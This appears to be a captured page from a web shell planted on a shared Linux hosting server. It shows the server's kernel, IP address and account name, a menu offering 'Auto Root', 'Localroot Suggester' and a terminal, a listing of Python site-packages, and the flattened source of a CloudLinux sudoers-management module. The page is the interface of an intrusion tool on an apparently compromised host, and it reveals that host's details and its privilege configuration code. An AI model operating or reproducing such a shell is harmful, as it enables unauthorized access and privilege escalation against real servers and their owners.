Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.217.46
Domains :
Cant Read [ /etc/named.conf ]
User : celfico1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
Delete
Unzip
Name
Size
Permission
Date
Action
Babel-0.9.6-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-13 03:21
Jinja2-2.7.2-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-13 03:21
_markerlib
[ DIR ]
drwxr-xr-x
2020-06-12 11:02
babel
[ DIR ]
drwxr-xr-x
2020-06-13 03:21
backports
[ DIR ]
drwxr-xr-x
2020-06-12 11:02
chardet
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
chardet-2.2.1-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
clcommon
[ DIR ]
drwxr-xr-x
2020-06-13 03:21
concurrent
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
decorator-3.4.0-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
firewall
[ DIR ]
drwxr-xr-x
2021-05-13 18:23
futures-3.1.1-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
google
[ DIR ]
drwxr-xr-x
2020-06-13 04:02
iniparse
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
isc
[ DIR ]
drwxr-xr-x
2026-06-03 18:23
jinja2
[ DIR ]
drwxr-xr-x
2020-06-13 03:21
kitchen
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
kitchen-1.1.1-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
lsm
[ DIR ]
drwxr-xr-x
2021-04-28 18:18
ply
[ DIR ]
drwxr-xr-x
2020-06-12 11:02
procfs
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
protobuf-2.5.0-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-13 04:02
pycriu
[ DIR ]
drwxr-xr-x
2026-06-02 18:21
pyudev
[ DIR ]
drwxr-xr-x
2020-06-12 08:01
pyudev-0.15-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 08:01
rhn
[ DIR ]
drwxr-xr-x
2020-06-13 03:21
rpmUtils
[ DIR ]
drwxr-xr-x
2022-08-19 18:18
setuptools
[ DIR ]
drwxr-xr-x
2020-06-12 11:02
setuptools-0.9.8-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 11:02
six-1.9.0-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
slip
[ DIR ]
drwxr-xr-x
2020-06-12 08:01
sos
[ DIR ]
drwxr-xr-x
2026-05-26 18:19
tuned
[ DIR ]
drwxr-xr-x
2022-10-12 18:18
urlgrabber
[ DIR ]
drwxr-xr-x
2020-06-12 09:13
yum
[ DIR ]
drwxr-xr-x
2022-08-19 18:18
yum_langpacks-0.4.2-py2.7.egg-info
[ DIR ]
drwxr-xr-x
2020-06-12 08:01
yumutils
[ DIR ]
drwxr-xr-x
2020-06-12 09:13
IPy-0.75-py2.7.egg-info
9.83
KB
-rw-r--r--
2014-06-10 07:18
IPy.py
50.07
KB
-rw-r--r--
2011-04-12 11:53
IPy.pyc
39.92
KB
-rw-r--r--
2014-06-10 07:18
IPy.pyo
39.92
KB
-rw-r--r--
2014-06-10 07:18
augeas.py
23
KB
-rw-r--r--
2014-08-31 16:44
augeas.pyc
21.69
KB
-rw-r--r--
2015-11-20 03:15
augeas.pyo
21.69
KB
-rw-r--r--
2015-11-20 03:15
backports.ssl_match_hostname-3.5.0.1-py2.7.egg-info
3.96
KB
-rw-r--r--
2018-04-11 02:25
clsudo.py
12.65
KB
-rw-r--r--
2017-06-01 16:14
clsudo.pyc
11.02
KB
-rw-r--r--
2017-06-01 16:14
clsudo.pyo
11.02
KB
-rw-r--r--
2017-06-01 16:14
configobj-4.7.2-py2.7.egg-info
2.08
KB
-rw-r--r--
2014-06-10 06:57
configobj.py
86.1
KB
-rw-r--r--
2010-02-27 21:36
configobj.pyc
64.72
KB
-rw-r--r--
2014-06-10 06:57
configobj.pyo
64.72
KB
-rw-r--r--
2014-06-10 06:57
crit-0.0.1-py2.7.egg-info
231
B
-rw-r--r--
2026-05-15 14:56
decorator.py
10.39
KB
-rw-r--r--
2012-10-18 08:49
decorator.pyc
8.36
KB
-rw-r--r--
2014-06-09 23:45
decorator.pyo
8.32
KB
-rw-r--r--
2014-06-09 23:45
easy-install.pth
209
B
-rw-r--r--
2020-06-12 11:13
easy_install.py
126
B
-rw-r--r--
2013-07-15 17:12
easy_install.pyc
315
B
-rw-r--r--
2017-08-02 10:18
easy_install.pyo
315
B
-rw-r--r--
2017-08-02 10:18
hwdata.py
5.89
KB
-rw-r--r--
2012-03-02 16:22
hwdata.pyc
4.38
KB
-rw-r--r--
2014-09-17 15:02
hwdata.pyo
4.38
KB
-rw-r--r--
2014-09-17 15:02
iniparse-0.4-py2.7.egg-info
1.06
KB
-rw-r--r--
2014-06-09 22:04
ipaddr-2.1.11-py2.7.egg-info
588
B
-rw-r--r--
2019-08-06 19:09
ipaddr.py
58.16
KB
-rw-r--r--
2019-08-06 19:09
ipaddr.pyc
56.22
KB
-rw-r--r--
2019-08-06 19:09
ipaddr.pyo
56.03
KB
-rw-r--r--
2019-08-06 19:09
ipaddress-1.0.16-py2.7.egg-info
783
B
-rw-r--r--
2016-11-05 16:37
ipaddress.py
78.03
KB
-rw-r--r--
2015-12-28 17:09
ipaddress.pyc
73.75
KB
-rw-r--r--
2016-11-05 16:37
ipaddress.pyo
73.57
KB
-rw-r--r--
2016-11-05 16:37
isc-2.0-py2.7.egg-info
267
B
-rw-r--r--
2026-05-27 23:00
langtable-0.0.31-py2.7.egg-info
2.66
KB
-rw-r--r--
2019-08-09 00:10
langtable.py
74.29
KB
-rw-r--r--
2019-08-09 00:10
langtable.pyc
55.85
KB
-rw-r--r--
2019-08-09 00:10
langtable.pyo
55.85
KB
-rw-r--r--
2019-08-09 00:10
pciutils-1.7.3-py2.7.egg-info
267
B
-rw-r--r--
2014-09-17 15:02
pkg_resources.py
98.74
KB
-rw-r--r--
2013-07-15 17:12
pkg_resources.pyc
105.5
KB
-rw-r--r--
2017-08-02 10:18
pkg_resources.pyo
105.47
KB
-rw-r--r--
2017-08-02 10:18
ply-3.4-py2.7.egg-info
900
B
-rw-r--r--
2017-08-03 00:46
protobuf-2.5.0-py2.7-nspkg.pth
307
B
-rw-r--r--
2015-11-27 20:32
pyparsing-1.5.6-py2.7.egg-info
670
B
-rw-r--r--
2014-06-09 22:15
pyparsing.py
151.79
KB
-rw-r--r--
2014-06-09 22:15
pyparsing.pyc
145.41
KB
-rw-r--r--
2014-06-09 22:15
pyparsing.pyo
145.41
KB
-rw-r--r--
2014-06-09 22:15
python_augeas-0.5.0-py2.7.egg-info
238
B
-rw-r--r--
2015-11-20 03:15
python_linux_procfs-0.4.9-py2.7.egg-info
350
B
-rw-r--r--
2019-08-09 02:08
pyzor-1.0.0-py2.7.egg
78.18
KB
-rw-r--r--
2020-06-12 11:13
rhnlib-2.5.65-py2.7.egg-info
345
B
-rw-r--r--
2018-10-30 18:36
secureio.py
9.01
KB
-rw-r--r--
2017-06-01 16:14
secureio.pyc
4.58
KB
-rw-r--r--
2017-06-01 16:14
secureio.pyo
4.58
KB
-rw-r--r--
2017-06-01 16:14
six.py
28.97
KB
-rw-r--r--
2015-01-02 16:33
six.pyc
29.01
KB
-rw-r--r--
2015-11-20 02:55
six.pyo
29.01
KB
-rw-r--r--
2015-11-20 02:55
slip-0.4.0-py2.7.egg-info
196
B
-rw-r--r--
2018-04-11 01:49
slip.dbus-0.4.0-py2.7.egg-info
269
B
-rw-r--r--
2018-04-11 01:49
urlgrabber-3.10-py2.7.egg-info
2.21
KB
-rw-r--r--
2020-04-01 04:14
validate.py
45.22
KB
-rw-r--r--
2014-06-10 06:57
validate.pyc
45.62
KB
-rw-r--r--
2014-06-10 06:57
validate.pyo
45.62
KB
-rw-r--r--
2014-06-10 06:57
Save
Rename
import os import pwd import grp import re import subprocess import tempfile from stat import S_IRUSR, S_IRGRP class NoSuchUser(Exception): def __init__(self, user): message = 'No such user (%s)' % user Exception.__init__(self, 'No such user (%s)' % (user,)) class NoSuchGroup(Exception): def __init__(self, group): message = 'No such group (%s)' % group Exception.__init__(self, message) class UnableToReadFile(Exception): def __init__(self): Exception.__init__(self, 'Cannot read sudoers file') class UnableToWriteFile(Exception): def __init__(self): Exception.__init__(self, 'Cannot modify sudoers file') ALIAS_LVECTL_CMDS = [ "/bin/ps", "/bin/grep", "/sbin/service", "/usr/bin/getcontrolpaneluserspackages", "/usr/sbin/lvectl", "/usr/local/directadmin/plugins/new_lvemanager/admin/GetDomains" ] ALIAS_SELECTOR_CMDS = [ "/usr/bin/cl-selector", "/usr/bin/piniset", "/usr/sbin/lveps", "/usr/bin/selectorctl" ] DEFAULTS_REQUIRETTY = 'Defaults:%s !requiretty' # Patterns for group GROUP_LVECTL_SELECTOR = '%%%s ALL=NOPASSWD: LVECTL_CMDS, SELECTOR_CMDS' GROUP_DEFAULTS_REQUIRETTY = 'Defaults:%%%s !requiretty' class Clsudo(object): """ Adds CloudLinux users to sudoers file """ filepath = '/etc/sudoers' temp_dir = '/etc' temp_prefix = 'lve_sudoers_' def add_user(user): """ Adds username to sudoers file """ Clsudo._check_user(user) Clsudo._get_contents(user) if not Clsudo.has_alias: Clsudo.sudoers_list.append ( 'Cmnd_Alias LVECTL_CMDS = ' + ", ".join( ALIAS_LVECTL_CMDS ) ) if not Clsudo.has_selector_alias: Clsudo.sudoers_list.append('Cmnd_Alias SELECTOR_CMDS = ' + ", ".join( ALIAS_SELECTOR_CMDS )) if not Clsudo.has_rights: Clsudo.sudoers_list.append('%s ALL=NOPASSWD: LVECTL_CMDS' % (user,)) if not Clsudo.has_selector_rights: Clsudo.sudoers_list.append('%s ALL=NOPASSWD: SELECTOR_CMDS' % (user,)) if not Clsudo.has_action: Clsudo.sudoers_list.append(DEFAULTS_REQUIRETTY % (user,)) Clsudo._write_contents() add_user = staticmethod(add_user) def add_cagefs_user(user): """ Adds username to sudoers file """ Clsudo._check_user(user) Clsudo._get_contents(user) if not Clsudo.has_cagefs_alias: Clsudo.sudoers_list.append('Cmnd_Alias CAGEFS_CMDS = /usr/sbin/cagefsctl, ' '/bin/ps, /bin/grep, /sbin/service') if not Clsudo.has_cagefs_rights: Clsudo.sudoers_list.append('%s ALL=NOPASSWD: CAGEFS_CMDS' % (user,)) if not Clsudo.has_action: Clsudo.sudoers_list.append(DEFAULTS_REQUIRETTY % (user,)) Clsudo._write_contents() add_cagefs_user = staticmethod(add_cagefs_user) def add_lvemanager_group(group_name): """ Adds group to sudoers file, grants access to LVE Manager """ Clsudo._check_group(group_name) Clsudo._get_contents_group(group_name) if not Clsudo.has_alias: Clsudo.sudoers_list.append ( 'Cmnd_Alias LVECTL_CMDS = ' + ", ".join( ALIAS_LVECTL_CMDS ) ) if not Clsudo.has_selector_alias: Clsudo.sudoers_list.append('Cmnd_Alias SELECTOR_CMDS = ' + ", ".join( ALIAS_SELECTOR_CMDS )) if not Clsudo.has_action: Clsudo.sudoers_list.append(GROUP_LVECTL_SELECTOR % (group_name,)) if not Clsudo.has_group_action: Clsudo.sudoers_list.append(GROUP_DEFAULTS_REQUIRETTY % (group_name,)) # writes file Clsudo._write_contents() add_lvemanager_group = staticmethod(add_lvemanager_group) def remove_user(user): """ Removes username from sudoers file """ try: f = open(Clsudo.filepath) Clsudo.sudoers_list = f.read().splitlines() f.close() idx = 0 removed = False while idx < len(Clsudo.sudoers_list): line = Clsudo.sudoers_list[idx] if (('%s ALL=NOPASSWD:' % (user,)) in line) or ((DEFAULTS_REQUIRETTY % (user,))in line): Clsudo.sudoers_list.remove(line) removed = True continue idx += 1 if removed: Clsudo._write_contents() except (IOError, OSError): raise UnableToReadFile() remove_user = staticmethod(remove_user) def update_user(user): """ updates username in sudoers file """ # Check user presence in system Clsudo._check_user(user) Clsudo._get_contents(user) cmnd_dict = {"Cmnd_Alias LVECTL_CMDS":ALIAS_LVECTL_CMDS, "Cmnd_Alias SELECTOR_CMDS": ALIAS_SELECTOR_CMDS} is_sudoer_change = 0 for idx in range(len(Clsudo.sudoers_list)): comand_string = Clsudo.sudoers_list[idx] for aliase_key, aliase_list in cmnd_dict.iteritems(): if aliase_key in comand_string: comand_string = comand_string.replace(aliase_key,"").strip() cmnd_list = comand_string.split(",") for aliase_cmnd_item in aliase_list: if aliase_cmnd_item not in cmnd_list: is_sudoer_change = 1 Clsudo.sudoers_list[idx] = "%s = %s" % (aliase_key, ", ".join(aliase_list)) break if(is_sudoer_change == 1): Clsudo._write_contents() update_user = staticmethod(update_user) def _check_user(user): """ Checks passwd database for username presence @param user: string """ try: pwd.getpwnam(user) except KeyError: raise NoSuchUser(user) _check_user = staticmethod(_check_user) def _check_group(group_name): """ Checks grp database for group_name presence @param group_name: string """ try: grp.getgrnam(group_name) except KeyError: raise NoSuchGroup(group_name) _check_group = staticmethod(_check_group) def _get_contents(user): """ Reads file into list of strings @param filename: string """ # Clear all status flags Clsudo.has_action = False Clsudo.has_group_action = False Clsudo.has_alias = False Clsudo.has_rights = False Clsudo.has_selector_alias = False Clsudo.has_selector_rights = False Clsudo.has_cagefs_alias = False Clsudo.has_cagefs_rights = False require_tty_pattern = re.compile(r'Defaults:\s*%s\s*!requiretty' % user) try: i = open(Clsudo.filepath) Clsudo.sudoers_list = i.read().splitlines() i.close() for idx in range(len(Clsudo.sudoers_list)): if "Cmnd_Alias LVECTL_CMDS" in Clsudo.sudoers_list[idx]: Clsudo.has_alias = True continue if "Cmnd_Alias CAGEFS_CMDS" in Clsudo.sudoers_list[idx]: Clsudo.has_cagefs_alias = True continue if ("%s ALL=NOPASSWD: LVECTL_CMDS" % (user,) in Clsudo.sudoers_list[idx]): Clsudo.has_rights = True continue if "%s ALL=NOPASSWD: CAGEFS_CMDS" % (user,) in Clsudo.sudoers_list[idx]: Clsudo.has_cagefs_rights = True continue if "requiretty" in Clsudo.sudoers_list[idx]: pattern_match = require_tty_pattern.search( Clsudo.sudoers_list[idx]) if pattern_match: Clsudo.has_action = True continue if "Cmnd_Alias SELECTOR_CMDS" in Clsudo.sudoers_list[idx]: if 'piniset' not in Clsudo.sudoers_list[idx]: Clsudo.sudoers_list[idx] = Clsudo.sudoers_list[idx].replace( '/usr/bin/cl-selector', '/usr/bin/cl-selector, /usr/bin/piniset') if 'lveps' not in Clsudo.sudoers_list[idx]: Clsudo.sudoers_list[idx] = Clsudo.sudoers_list[idx].replace( '/usr/bin/cl-selector, /usr/bin/piniset', '/usr/bin/cl-selector, /usr/bin/piniset, /usr/sbin/lveps') Clsudo.has_selector_alias = True continue if ("%s ALL=NOPASSWD: SELECTOR_CMDS" % (user,) in Clsudo.sudoers_list[idx]): Clsudo.has_selector_rights = True continue except (IOError, OSError): raise UnableToReadFile() _get_contents = staticmethod(_get_contents) def _get_contents_group(group_name): """ Reads file into list of strings @param group_name: string """ # Clear all status flags Clsudo.has_action = False Clsudo.has_group_action = False Clsudo.has_alias = False Clsudo.has_rights = False Clsudo.has_selector_alias = False Clsudo.has_selector_rights = False Clsudo.has_cagefs_alias = False Clsudo.has_cagefs_rights = False group_prefix = "%%%s" % group_name group_action = "Defaults:%%%s" % group_name group_pattern = re.compile(r'%s\s*ALL=NOPASSWD:\s*LVECTL_CMDS,\s*SELECTOR_CMDS' % (group_name,)) try: i = open(Clsudo.filepath) Clsudo.sudoers_list = i.read().splitlines() i.close() for idx in range(len(Clsudo.sudoers_list)): if "Cmnd_Alias SELECTOR_CMDS" in Clsudo.sudoers_list[idx]: if 'piniset' not in Clsudo.sudoers_list[idx]: Clsudo.sudoers_list[idx] = Clsudo.sudoers_list[idx].replace( '/usr/bin/cl-selector', '/usr/bin/cl-selector, /usr/bin/piniset') if 'lveps' not in Clsudo.sudoers_list[idx]: Clsudo.sudoers_list[idx] = Clsudo.sudoers_list[idx].replace( '/usr/bin/cl-selector, /usr/bin/piniset', '/usr/bin/cl-selector, /usr/bin/piniset, /usr/sbin/lveps') Clsudo.has_selector_alias = True continue if "Cmnd_Alias LVECTL_CMDS" in Clsudo.sudoers_list[idx]: Clsudo.has_alias = True continue if "Cmnd_Alias CAGEFS_CMDS" in Clsudo.sudoers_list[idx]: Clsudo.has_cagefs_alias = True continue if Clsudo.sudoers_list[idx].startswith(group_prefix): pattern_match = group_pattern.search(Clsudo.sudoers_list[idx]) if pattern_match: Clsudo.has_action = True if Clsudo.sudoers_list[idx].startswith(group_action): Clsudo.has_group_action = True if Clsudo.sudoers_list[idx].startswith(group_action): Clsudo.has_group_action = True except (IOError, OSError): raise UnableToReadFile() _get_contents_group = staticmethod(_get_contents_group) def _write_contents(): """ Writes data to temporary file then checks it and rewrites sudoers file """ try: fd, temp_path = tempfile.mkstemp( prefix=Clsudo.temp_prefix, dir=Clsudo.temp_dir) fo = os.fdopen(fd, 'w') fo.write('\n'.join(Clsudo.sudoers_list) + '\n') fo.close() mask = S_IRUSR | S_IRGRP os.chmod(temp_path, mask) if not Clsudo._is_file_valid(temp_path): raise IOError except (IOError, OSError): try: if os.path.exists(temp_path): os.unlink(temp_path) except: pass raise UnableToWriteFile() try: os.rename(temp_path, Clsudo.filepath) except OSError: raise UnableToWriteFile() _write_contents = staticmethod(_write_contents) def _is_file_valid(filename): cmd = [ '/usr/sbin/visudo', '-c', '-f', filename ] rv = subprocess.Popen( cmd, stdin=open('/dev/null'), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True) rt = rv.communicate() if rv.returncode != 0: return False return True _is_file_valid = staticmethod(_is_file_valid)